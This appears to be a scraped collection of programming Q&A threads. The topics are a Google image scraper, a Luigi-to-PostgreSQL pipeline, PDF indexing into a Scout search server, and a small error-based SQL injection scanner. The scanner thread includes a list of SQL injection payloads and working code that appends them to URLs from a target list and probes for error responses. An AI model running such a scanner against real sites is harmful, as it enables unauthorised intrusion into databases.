Python: write a string to a text file

I'm using Python to save images to a folder; see the code:
def save_image(raw_image, image_type, save_directory):
    extension = image_type if image_type else 'jpg'
    file_name = str(uuid.uuid4().hex) + "." + extension
    save_path = os.path.join(save_directory, file_name)
    with open(save_path, 'wb+') as image_file:
        image_file.write(raw_image)
I also want to save the same file name, line by line, in a text file. Can someone tell me how to do this?
Complete code:
# thanks https://gist.github.com/genekogan/ebd77196e4bf0705db51f86431099e57

import argparse
import json
import itertools
import logging
import re
import os
import uuid
import sys
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup

def configure_logging():
    logger = logging.getLogger()
    logger.setLevel(logging.DEBUG)
    handler = logging.StreamHandler()
    handler.setFormatter(
        logging.Formatter('[%(asctime)s %(levelname)s %(module)s]: %(message)s'))
    logger.addHandler(handler)
    return logger

logger = configure_logging()

REQUEST_HEADER = {
    'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36"}

def get_soup(url, header):
    response = urlopen(Request(url, headers=header))
    return BeautifulSoup(response, 'html.parser')

def get_query_url(query):
    return "https://www.google.co.in/search?q=%s&tbm=isch&source=lnt&tbs=isz:l&sa=X&ved=0ahUKEwjpx6rng6faAhWIzlMKHSHBB8oQpwUIHg&biw=1366&bih=702&dpr=1" % query

def extract_images_from_soup(soup):
    image_elements = soup.find_all("div", {"class": "rg_meta"})
    metadata_dicts = (json.loads(e.text) for e in image_elements)
    link_type_records = ((d["ou"], d["ity"]) for d in metadata_dicts)
    return link_type_records

def extract_images(query, num_images):
    url = get_query_url(query)
    logger.info("Souping")
    soup = get_soup(url, REQUEST_HEADER)
    logger.info("Extracting image urls")
    link_type_records = extract_images_from_soup(soup)
    return itertools.islice(link_type_records, num_images)

def get_raw_image(url):
    req = Request(url, headers=REQUEST_HEADER)
    resp = urlopen(req)
    return resp.read()

def save_image(raw_image, image_type, save_directory):
    extension = image_type if image_type else 'jpg'
    file_name = str(uuid.uuid4().hex) + "." + extension
    save_path = os.path.join(save_directory, file_name)
    with open(save_path, 'wb+') as image_file:
        image_file.write(raw_image)

def download_images_to_dir(images, save_directory, num_images):
    for i, (url, image_type) in enumerate(images):
        try:
            logger.info("Making request (%d/%d): %s", i, num_images, url)
            raw_image = get_raw_image(url)
            save_image(raw_image, image_type, save_directory)
        except Exception as e:
            logger.exception(e)

def run(query, save_directory, num_images=100):
    query = '+'.join(query.split())
    logger.info("Extracting image links")
    images = extract_images(query, num_images)
    logger.info("Downloading images")
    download_images_to_dir(images, save_directory, num_images)
    logger.info("Finished")

def main():
    parser = argparse.ArgumentParser(description='Scrape Google images')
    parser.add_argument('-s', '--search', default='bananas', type=str, help='search term')
    parser.add_argument('-n', '--num_images', default=1, type=int, help='num images to save')
    parser.add_argument('-d', '--directory', default='C:/Users/user/desktop/potter/images', type=str, help='save directory')
    args = parser.parse_args()
    run(args.search, args.directory, args.num_images)

if __name__ == '__main__':
    main()
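A minimal sketch of the requested behaviour, reusing the two functions from the script above: have save_image return the generated file name and append it to a text file in the caller. The file name saved_files.txt is my own choice, not something from the original code.

# Sketch: save_image returns the generated file name, and the caller appends
# it to a log file, one name per line. "saved_files.txt" is an assumed name.
def save_image(raw_image, image_type, save_directory):
    extension = image_type if image_type else 'jpg'
    file_name = str(uuid.uuid4().hex) + "." + extension
    save_path = os.path.join(save_directory, file_name)
    with open(save_path, 'wb+') as image_file:
        image_file.write(raw_image)
    return file_name

def download_images_to_dir(images, save_directory, num_images):
    names_path = os.path.join(save_directory, "saved_files.txt")
    for i, (url, image_type) in enumerate(images):
        try:
            raw_image = get_raw_image(url)
            file_name = save_image(raw_image, image_type, save_directory)
            # 'a' appends across runs; the trailing newline keeps one name per line
            with open(names_path, "a") as names_file:
                names_file.write(file_name + "\n")
        except Exception as e:
            logger.exception(e)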

Related

I am getting an error when pushing data to a PostgreSQL server in Luigi, even though the plain Python script works completely fine

I was building a data pipeline that gets JSON data from a URL, converts it into CSV format, cleans the data a bit, and then pushes it to a SQL server.
Everything works except for the last task, where I get this error:
RuntimeError: Unfulfilled dependency at run time: dataclean__99914b932b
import requests
import luigi
from bs4 import BeautifulSoup
import json
import csv
import pandas as pd
import psycopg2

class scrapper(luigi.Task):
    """
    Get data from nycstationinfo.com
    """
    def output(self):
        return luigi.LocalTarget("nycbikedata.json")

    def run(self):
        headers = {
            'Access-Control-Allow-Origin': '*',
            'Access-Control-Allow-Methods': 'GET',
            'Access-Control-Allow-Headers': 'Content-Type',
            'Access-Control-Max-Age': '3600',
            'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
        }
        url = "https://gbfs.citibikenyc.com/gbfs/en/station_information.json"
        req = requests.get(url, headers)
        soup = BeautifulSoup(req.content, 'html.parser')
        # get the whole dump of the webpage in prettified form
        data = soup.prettify()
        # removing backslashes due to wrapping
        json_string = json.dumps(data)
        mod_json_strings = json.loads(json_string)
        # writing the formatted data to a file
        with self.output().open('w') as outfile:
            outfile.write(mod_json_strings)

class converter(luigi.Task):
    def requires(self):
        return scrapper()

    def output(self):
        return luigi.LocalTarget("nycbikedata.csv")

    def run(self):
        # opening json file with data
        with self.input().open('r') as json_file:
            data = json.load(json_file)
        # all the data is in the 'stations' object of the json file
        station = data['data']['stations']
        data_file = self.output().open('w')
        csv_writer = csv.writer(data_file)
        count = 0
        for x in station:
            if count == 0:
                # Writing headers of CSV file
                header = x.keys()
                csv_writer.writerow(header)
                count += 1
            # Writing data of CSV file
            csv_writer.writerow(x.values())
        data_file.close()

class dataclean(luigi.Task):
    def requires(self):
        return converter()

    def run(self):
        df = pd.read_csv(self.input().open('r'))
        x = df.drop(df.columns[6:], axis=1)
        x = x[:1001]
        x.to_csv('formated.csv', index=False)

class datapush(luigi.Task):
    def requires(self):
        return dataclean()

    def run(self):
        hostname = 'localhost'
        database = 'mydb2'
        username = 'bob'
        pwd = 'admin'
        port_id = 5432
        try:
            conn = psycopg2.connect(
                host=hostname,
                dbname=database,
                user=username,
                password=pwd,
                port=port_id)
            cur = conn.cursor()
            create_script = '''CREATE TABLE IF NOT EXISTS nyc_station(
                name varchar(240),
                lon float,
                lat float,
                region_id int,
                rental_methods varchar(140),
                station_id int); '''
            cur.execute(create_script)
            sql2 = '''COPY nyc_station(name,lon,lat,region_id,rental_methods,station_id)
                FROM '/home/wassey/luigi-demo/formated.csv'
                DELIMITER ','
                CSV HEADER;'''
            cur.execute(sql2)
            conn.commit()
        except Exception as error:
            print('error')
        finally:
            if cur is not None:
                cur.close()
            if conn is not None:
                conn.close()

if __name__ == "__main__":
    luigi.run()
All the tasks work fine except for datapush, but if I run the script separately outside Luigi it works completely fine and pushes the data.
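A likely cause, offered as a sketch rather than a confirmed fix: Luigi's default complete() reports a task as done only when every target returned by output() exists, and a task with no output() at all is never considered complete. So even after dataclean runs, datapush still sees it as an unfulfilled dependency. Giving dataclean an explicit target for the file its run() already writes would address that:

# Sketch: give dataclean an output() so Luigi can tell it has finished.
# The target simply points at the CSV that run() already produces.
class dataclean(luigi.Task):
    def requires(self):
        return converter()

    def output(self):
        return luigi.LocalTarget('formated.csv')

    def run(self):
        df = pd.read_csv(self.input().open('r'))
        x = df.drop(df.columns[6:], axis=1)
        x = x[:1001]
        x.to_csv(self.output().path, index=False)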

Unable to remove new lines from list in python scanner

I am trying to create a simple error-based SQLi scanner that tacks some common SQLi payloads onto the ends of query values in URLs. I have this working when providing a single URL, but I cannot get it to work properly when passing a file of URLs. The lists of URLs with the payloads come back, but I have not been able to figure out how to remove the '\n' at the end of each URL in the list so that I can request each URL.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
from urllib.parse import urlparse, urlunparse, quote_plus

print('\t SQLiScan')

# arguments
def getArgs():
    parser = argparse.ArgumentParser(description='Error-based SQLi scan')
    parser.add_argument('-l', '--list', help='List of target urls')
    parser.add_argument('-u', '--url', help='Target url')
    args = parser.parse_args()
    return args

# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(url):
    result = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    parsed = urlparse(url)
    queries = parsed.query.split('&')
    for payload in payloads:
        new_query = "&".join(["{}{}".format(query, payload) for query in queries])
        parsed = parsed._replace(query=new_query)
        result.append(urlunparse(parsed))
    request_url = "\n".join(map(str, result))
    request_url = quote_plus(request_url, safe='\n:/')
    return request_url

if __name__ == '__main__':
    args = getArgs()
    url = args.url
    urls = loadFile(args.list)
    appendPayload(url)
This returns a list like this:
['https://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%22\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B1%5D\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%5B%5D%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%60\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211/%2A%211111%27%2A/\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27%7C%7C%27asd%27%7C%7C%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211%27+or+%271%27%3D%271\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D9102014032084224211+or+1%3D1\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%27or%27%27%3D%27\nhttps://www.example.com/sneakers/products/air-jordan-6-retro-unc-1332b420-74d9-439c-9cb1-2bda1b0c8417%3F_branch_match_id%3D910201403208422421%271+or+1%3D%271']
After updating the code, I am still having difficulty requesting each URL properly:
# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(url):
    result = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    parsed = urlparse(url)
    queries = parsed.query.split('&')
    for payload in payloads:
        new_query = "&".join(["{}{}".format(query, payload) for query in queries])
        parsed = parsed._replace(query=new_query)
        result.append(urlunparse(parsed))
    # request_url = ",".join(map(str, result))
    # result = [quote_plus(x, safe='\n:/') for x in result]
    print(result)
    return result

if __name__ == '__main__':
    args = getArgs()
    url = args.url
    urls = loadFile(args.list)
    for url in urls:
        request = requests.get(appendPayload(url))
This is returning:
requests.exceptions.InvalidSchema: No connection adapters were found for '["http://exampe.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1"\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[1]\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?[]=1\', \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1`\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1/*!1111\'*/", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\'||\'asd\'||\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1\' or \'1\'=\'1", \'http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?1 or 1=1\', "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'or\'\'=\'", "http://example.com/&esheet=52378722&newsitemid=20210215005043&lan=en-US&anchor=example.com&index=1&md5=3367aa50e8bdfe66b505f114178eb403?\'1 or 1=\'1"]'
It seems like it may have to do with the quotes appearing in front of the https: in some of the lines.
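For what it is worth, the error message shows the string representation of an entire list being used as a URL: appendPayload now returns a list, but the list itself is passed to requests.get. A minimal sketch of requesting each generated URL individually instead:

# Sketch: appendPayload returns a list, so iterate over it and request each
# payload URL on its own rather than passing the whole list to requests.get.
if __name__ == '__main__':
    args = getArgs()
    urls = loadFile(args.list)
    for url in urls:
        for target in appendPayload(url):
            response = requests.get(target)
            print(response.status_code, target)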
Update:
After much trying, I finally got this working the way I was looking for.
import argparse
from concurrent.futures import ThreadPoolExecutor
import requests
import sys
import time
from urllib.parse import urlparse, urlunparse, quote_plus
from urllib3.exceptions import InsecureRequestWarning

# Suppress only the single warning from urllib3 needed.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

print('\t SQLiScan')

# arguments
def getArgs():
    parser = argparse.ArgumentParser(description='Error-based SQLi scan')
    parser.add_argument('-l', '--list', help='List of target urls')
    parser.add_argument('-u', '--url', help='Target url')
    args = parser.parse_args()
    return args

# Load file of urls for scan
def loadFile(file):
    target_urls = []
    with open(args.list, 'r') as f:
        for url in f.readlines():
            url = url.rstrip('\n')
            target_urls.append(url)
    return target_urls

# Append payloads to urls
def appendPayload(data):
    targets = []
    encoded = []
    payloads = ["1'", '1"', "[1]", "[]=1", "1`", "1/*'*/", "1/*!1111'*/",
                "1'||'asd'||'", "1' or '1'='1", "1 or 1=1", "'or''='",
                "'1 or 1='1"]
    for url in data:
        parsed_url = urlparse(url)
        url_queries = parsed_url.query.split("&")
        for payload in payloads:
            new_query = "&".join(["{}{}".format(query, payload) for query in url_queries])
            parsed = parsed_url._replace(query=new_query)
            targets.append(urlunparse(parsed))
    for target in targets:
        encode = quote_plus(target, safe='\n:/')
        encoded.append(encode)
    return encoded

args = getArgs()
data = loadFile(args.list)
targets = appendPayload(data)
counter = 0
for target in targets:
    counter += 1
    print(f'\r{counter} Requests sent', end='', flush=True)
    r = requests.get(target, verify=False)
    if r.status_code == 500 or r.status_code == 302:
        # note: the original line used unary "+" on strings, which raises a
        # TypeError; pass the values as separate print arguments instead
        print(r.status_code, target)
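ThreadPoolExecutor is imported above but never used. As a possible follow-up (a sketch, not part of the working script), the request loop could be parallelised with it; max_workers=10 is an arbitrary choice.

# Sketch only: run the probes concurrently with the already-imported
# ThreadPoolExecutor instead of one request at a time.
def probe(target):
    r = requests.get(target, verify=False)
    if r.status_code in (500, 302):
        print(r.status_code, target)
    return r.status_code

with ThreadPoolExecutor(max_workers=10) as pool:
    results = list(pool.map(probe, targets))
print(f'{len(results)} requests sent')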

How do you send many documents to a Scout Server in Python using the Python Scout Client?

I'm trying to index PDF text with a Python library called Scout. I have tried doing the same thing with Elasticsearch too. In both cases I can't figure out how to post text to an index in bulk using Python.
After a lot of research, I believe I need to use async HTTP requests. The only problem is, I don't understand async calls, nor do I understand what a Scout Python 'client' really is. I'm a self-taught programmer and still have many things I don't understand. My thought is that the client can't stay open for a loop to keep using the connection. I have seen coding concepts like "await" and "sessions" in many books on programming, but I don't know how to implement them. Can someone help me write some Python code that will successfully post new documents to a running Scout server and explain how it's done?
Here is my attempt:
from scout_client import Scout

# import libraries to help read and create PDF
import PyPDF2
from fpdf import FPDF
import base64
import os
from flask import Flask, jsonify, request, render_template, json

# before you start, run the Server.py file and create a Sqlite DB
# Step One: loop through the PDFs in the 'books' folder
for k in range(14, 15):
    # open the pdf file
    read_pdf = PyPDF2.PdfFileReader("books/%s.pdf" % (k))
    # Test to see if Step One is complete and successful
    #print (read_pdf)
    # Step Two: find out how many pages are in the document
    num = read_pdf.getNumPages()
    print("PDF pages:", num)
    # Step Three: collect the data page by page
    # create a list for page data
    all_pages = []
    # Step Four: create a new index on the Scout server
    # client.create_index('test3')
    # iterate the page numbers
    for page in range(num):
        data = read_pdf.getPage(page)
        #page_mode = read_pdf.getPageMode()
        # extract the page's text
        page_text = data.extractText()
        # put the text data into the list
        all_pages.append(page_text)

# initiate the Client from scout_client.py
client = Scout('http://localhost:8000')

# The issue: I tried for loops and while loops but can't get past:
# urllib.error.HTTPError: HTTP Error 400: BAD REQUEST
i = 1
while i <= num:
    client.create_document(all_pages[i], ['test3'])
    print(i, "....done")
    i += 1
I get an error:
Traceback (most recent call last):
  File "test.py", line 37, in <module>
    client.create_document(all_pages[i],['test3'])
  File "../Searchtest4/scout/scout_client.py", line 149, in create_document
    return self.post('/documents/', post_data, attachments)
  File "../Searchtest4/scout/scout_client.py", line 53, in post
    return self.post_json(url, data)
  File "../Searchtest4/scout/scout_client.py", line 63, in post_json
    return json.loads(urlopen(request).read().decode('utf8'))
  File "../lib/python3.7/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "../lib/python3.7/urllib/request.py", line 531, in open
    response = meth(req, response)
  File "../lib/python3.7/urllib/request.py", line 641, in http_response
    'http', request, response, code, msg, hdrs)
  File "../lib/python3.7/urllib/request.py", line 569, in error
    return self._call_chain(*args)
  File "../lib/python3.7/urllib/request.py", line 503, in _call_chain
    result = func(*args)
  File "../lib/python3.7/urllib/request.py", line 649, in http_error_default
    raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: BAD REQUEST
Here is the server that runs fine (server.py):
import logging
import optparse
import os
import sys
from flask import Flask
from werkzeug.serving import run_simple
from scout.exceptions import InvalidRequestException
from scout.models import database
from scout.models import Attachment
from scout.models import BlobData
from scout.models import Document
from scout.models import Index
from scout.models import IndexDocument
from scout.models import Metadata
from scout.views import register_views
logger = logging.getLogger('scout')
def create_server(config=None, config_file=None):
app = Flask(__name__)
# Configure application using a config file.
if config_file is not None:
app.config.from_pyfile(config_file)
# (Re-)Configure application using command-line switches/environment flags.
if config is not None:
app.config.update(config)
# Initialize the SQLite database.
initialize_database(app.config.get('DATABASE') or 'scout.db',
pragmas=app.config.get('SQLITE_PRAGMAS') or None)
register_views(app)
@app.errorhandler(InvalidRequestException)
def handle_invalid_request(exc):
return exc.response()
@app.before_request
def connect_database():
if database.database != ':memory:':
database.connect()
@app.teardown_request
def close_database(exc):
if database.database != ':memory:' and not database.is_closed():
database.close()
return app
def initialize_database(database_file, pragmas=None):
database.init(database_file, pragmas=pragmas)
try:
meth = database.execution_context
except AttributeError:
meth = database
with meth:
database.create_tables([
Attachment,
BlobData,
Document,
Index,
IndexDocument,
Metadata])
def run(app):
if app.config['DEBUG']:
app.run(host=app.config['HOST'], port=app.config['PORT'], debug=True)
else:
run_simple(
hostname=app.config['HOST'],
port=app.config['PORT'],
application=app,
threaded=True)
def panic(s, exit_code=1):
sys.stderr.write('\033[91m%s\033[0m\n' % s)
sys.stderr.flush()
sys.exit(exit_code)
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
dest='host',
help='The hostname to listen on. Defaults to 127.0.0.1.')
parser.add_option(
'-p',
'--port',
default=8000,
dest='port',
help='The port to listen on. Defaults to 8000.',
type='int')
parser.add_option(
'-u',
'--url-prefix',
dest='url_prefix',
help='URL path to prefix Scout API.')
parser.add_option(
'-s',
'--stem',
dest='stem',
help='Specify stemming algorithm for content.')
parser.add_option(
'-d',
'--debug',
action='store_true',
dest='debug',
help='Run Flask app in debug mode.')
parser.add_option(
'-c',
'--config',
dest='config',
help='Configuration module (python file).')
parser.add_option(
'--paginate-by',
default=50,
dest='paginate_by',
help='Number of documents displayed per page of results, default=50',
type='int')
parser.add_option(
'-k',
'--api-key',
dest='api_key',
help='Set the API key required to access Scout.')
parser.add_option(
'-C',
'--cache-size',
default=64,
dest='cache_size',
help='SQLite page-cache size (MB). Defaults to 64MB.',
type='int')
parser.add_option(
'-f',
'--fsync',
action='store_true',
dest='fsync',
help='Synchronize database to disk on every write.')
parser.add_option(
'-j',
'--journal-mode',
default='wal',
dest='journal_mode',
help='SQLite journal mode. Defaults to WAL (recommended).')
parser.add_option(
'-l',
'--logfile',
dest='logfile',
help='Log file')
return parser
def parse_options():
option_parser = get_option_parser()
options, args = option_parser.parse_args()
if options.logfile:
handler = logging.FileHandler(options.logfile)
logger.addHandler(handler)
config_file = os.environ.get('SCOUT_CONFIG') or options.config
config = {'DATABASE': os.environ.get('SCOUT_DATABASE')}
if len(args) == 0 and not config['DATABASE']:
panic('Error: missing required path to database file.')
elif len(args) > 1:
panic('Error: [%s] only accepts one argument, which is the path '
'to the database file.' % __file__)
elif args:
config['DATABASE'] = args[0]
pragmas = [('journal_mode', options.journal_mode)]
if options.cache_size:
pragmas.append(('cache_size', -1024 * options.cache_size))
if not options.fsync:
pragmas.append(('synchronous', 0))
config['SQLITE_PRAGMAS'] = pragmas
# Handle command-line options. These values will override any values
# that may have been specified in the config file.
if options.api_key:
config['AUTHENTICATION'] = options.api_key
if options.debug:
config['DEBUG'] = True
config['HOST'] = options.host or '127.0.0.1'
config['PORT'] = options.port or 8000
config['URL_PREFIX'] = options.url_prefix or ''
if options.paginate_by:
if options.paginate_by < 1 or options.paginate_by > 1000:
panic('paginate-by must be between 1 and 1000')
config['PAGINATE_BY'] = options.paginate_by
if options.stem:
if options.stem not in ('simple', 'porter'):
panic('Unrecognized stemmer. Must be "porter" or "simple".')
config['STEM'] = options.stem
return create_server(config, config_file)
def main():
app = parse_options()
run(app)
if __name__ == '__main__':
main()
and the so-called client (scout_client.py):
import base64
import json
try:
from email.generator import _make_boundary as choose_boundary
except ImportError:
from mimetools import choose_boundary
import mimetypes
import os
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib.request import Request
from urllib.request import urlopen
except ImportError:
from urllib2 import Request
from urllib2 import urlopen
import zlib
ENDPOINT = None
KEY = None
class Scout(object):
def __init__(self, endpoint=ENDPOINT, key=KEY):
self.endpoint = endpoint.rstrip('/')
self.key = key
def get_full_url(self, url):
return self.endpoint + url
def get_raw(self, url, **kwargs):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
if kwargs:
if '?' not in url:
url += '?'
url += urlencode(kwargs, True)
request = Request(self.get_full_url(url), headers=headers)
fh = urlopen(request)
return fh.read()
def get(self, url, **kwargs):
return json.loads(self.get_raw(url, **kwargs))
def post(self, url, data=None, files=None):
if files:
return self.post_files(url, data, files)
else:
return self.post_json(url, data)
def post_json(self, url, data=None):
headers = {'Content-Type': 'application/json'}
if self.key:
headers['key'] = self.key
data = json.dumps(data or {})
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read().decode('utf8'))
def post_files(self, url, json_data, files=None):
if not files or not isinstance(files, dict):
raise ValueError('One or more files is required. Files should be '
'passed as a dictionary of filename: file-like-'
'object.')
boundary = choose_boundary()
form_files = []
for i, (filename, file_obj) in enumerate(files.items()):
try:
data = file_obj.read()
except AttributeError:
data = bytes(file_obj)
mimetype = mimetypes.guess_type(filename)[0]
form_files.append((
'file_%s' % i,
filename,
mimetype or 'application/octet-stream',
data))
part_boundary = '--' + boundary
parts = [
part_boundary,
'Content-Disposition: form-data; name="data"',
'',
json.dumps(json_data)]
for field_name, filename, mimetype, data in form_files:
parts.extend((
part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % (
field_name, filename),
'Content-Type: %s' % mimetype,
'',
data))
parts.append('--' + boundary + '--')
parts.append('')
headers = {'Content-Type': 'multipart/form-data; boundary=%s' %
boundary}
if self.key:
headers['key'] = self.key
data = '\r\n'.join(parts)
if not isinstance(data, bytes):
data = data.encode('utf-8')
request = Request(self.get_full_url(url), data=data, headers=headers)
return json.loads(urlopen(request).read())
def delete(self, url):
headers = {}
if self.key:
headers['key'] = self.key
request = Request(self.get_full_url(url), headers=headers)
request.get_method = lambda: 'DELETE'
fh = urlopen(request)
return json.loads(fh.read())
def get_indexes(self, **kwargs):
return self.get('/', **kwargs)['indexes']
def create_index(self, name):
return self.post('/', {'name': name})
def rename_index(self, old_name, new_name):
return self.post('/%s/' % old_name, {'name': new_name})
def delete_index(self, name):
return self.delete('/%s/' % name)
def get_index(self, name, **kwargs):
return self.get('/%s/' % name, **kwargs)
def get_documents(self, **kwargs):
return self.get('/documents/', **kwargs)
def create_document(self, content, indexes, identifier=None,
attachments=None, **metadata):
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
post_data = {
'content': content,
'identifier': identifier,
'indexes': indexes,
'metadata': metadata}
return self.post('/documents/', post_data, attachments)
def update_document(self, document_id=None, content=None, indexes=None,
metadata=None, identifier=None, attachments=None):
if not document_id and not identifier:
raise ValueError('`document_id` must be provided.')
data = {}
if content is not None:
data['content'] = content
if indexes is not None:
if not isinstance(indexes, (list, tuple)):
indexes = [indexes]
data['indexes'] = indexes
if metadata is not None:
data['metadata'] = metadata
if not data and not attachments:
raise ValueError('Nothing to update.')
return self.post('/documents/%s/' % document_id, data, attachments)
def delete_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.delete('/documents/%s/' % document_id)
def get_document(self, document_id=None):
if not document_id:
raise ValueError('`document_id` must be provided.')
return self.get('/documents/%s/' % document_id)
def attach_files(self, document_id, attachments):
return self.post_files('/documents/%s/attachments/' % document_id,
{}, attachments)
def detach_file(self, document_id, filename):
return self.delete('/documents/%s/attachments/%s/' %
(document_id, filename))
def update_file(self, document_id, filename, file_object):
return self.post_files('/documents/%s/attachments/%s/' %
(document_id, filename),
{}, {filename: file_object})
def get_attachments(self, document_id, **kwargs):
return self.get('/documents/%s/attachments/' % document_id, **kwargs)
def get_attachment(self, document_id, filename):
return self.get('/documents/%s/attachments/%s/' %
(document_id, filename))
def download_attachment(self, document_id, filename):
return self.get_raw('/documents/%s/attachments/%s/download/' %
(document_id, filename))
def search_attachments(self, **kwargs):
return self.get('/documents/attachments/', **kwargs)
class SearchProvider(object):
def content(self, obj):
raise NotImplementedError
def identifier(self, obj):
raise NotImplementedError
def metadata(self, obj):
raise NotImplementedError
class SearchSite(object):
def __init__(self, client, index):
self.client = client
self.index = index
self.registry = {}
def register(self, model_class, search_provider):
self.registry.setdefault(model_class, [])
self.registry[model_class].append(search_provider())
def unregister(self, model_class, search_provider=None):
if search_provider is None:
self.registry.pop(model_class, None)
elif model_class in self.registry:
self.registry[model_class] = [
sp for sp in self.registry[model_class]
if not isinstance(sp, search_provider)]
def store(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
content = provider.content(obj)
try:
metadata = provider.metadata(obj)
except NotImplementedError:
metadata = {}
try:
identifier = provider.identifier(obj)
except NotImplementedError:
pass
else:
metadata['identifier'] = identifier
self.client.create_document(content, self.index, **metadata)
return True
def remove(self, obj):
if type(obj) not in self.registry:
return False
for provider in self.registry[type(obj)]:
self.client.delete_document(provider.identifier(obj))
return True
Finally, the documentation for Scout:
https://scout.readthedocs.io/en/latest/server.html#index-detail-index-name
https://charlesleifer.com/blog/meet-scout-a-search-server-powered-by-sqlite/
Any detailed help is much appreciated :)
So I found a lib called Scout and... got it to work!
from scout_client import Scout

# import libraries to help read and create PDF
import PyPDF2
from fpdf import FPDF
import base64
import os
from flask import Flask, jsonify, request, render_template, json

client = Scout('http://localhost:8000')

for k in range(7, 18):
    read_pdf = PyPDF2.PdfFileReader("books/%s.pdf" % (k))
    num = read_pdf.getNumPages()
    print("PDF pages:", num)
    all_pages = []
    for page in range(num):
        data = read_pdf.getPage(page)
        page_text = data.extractText()
        all_pages.append(page_text)

    import requests
    for z in all_pages:
        url = 'http://localhost:8000/documents/'
        data = {'content': z, 'indexes': ['test13']}
        headers = {
            'Content-Type': 'application/json',
        }
        response = requests.post(url, data=json.dumps(data), headers=headers)
        print(response)
I can now loop through as many PDFs as I want locally, post them to the server for indexing, and search for keywords.
Now I just need help with making a basic front end with a search bar that calls data from a JSON response in Python and Flask.
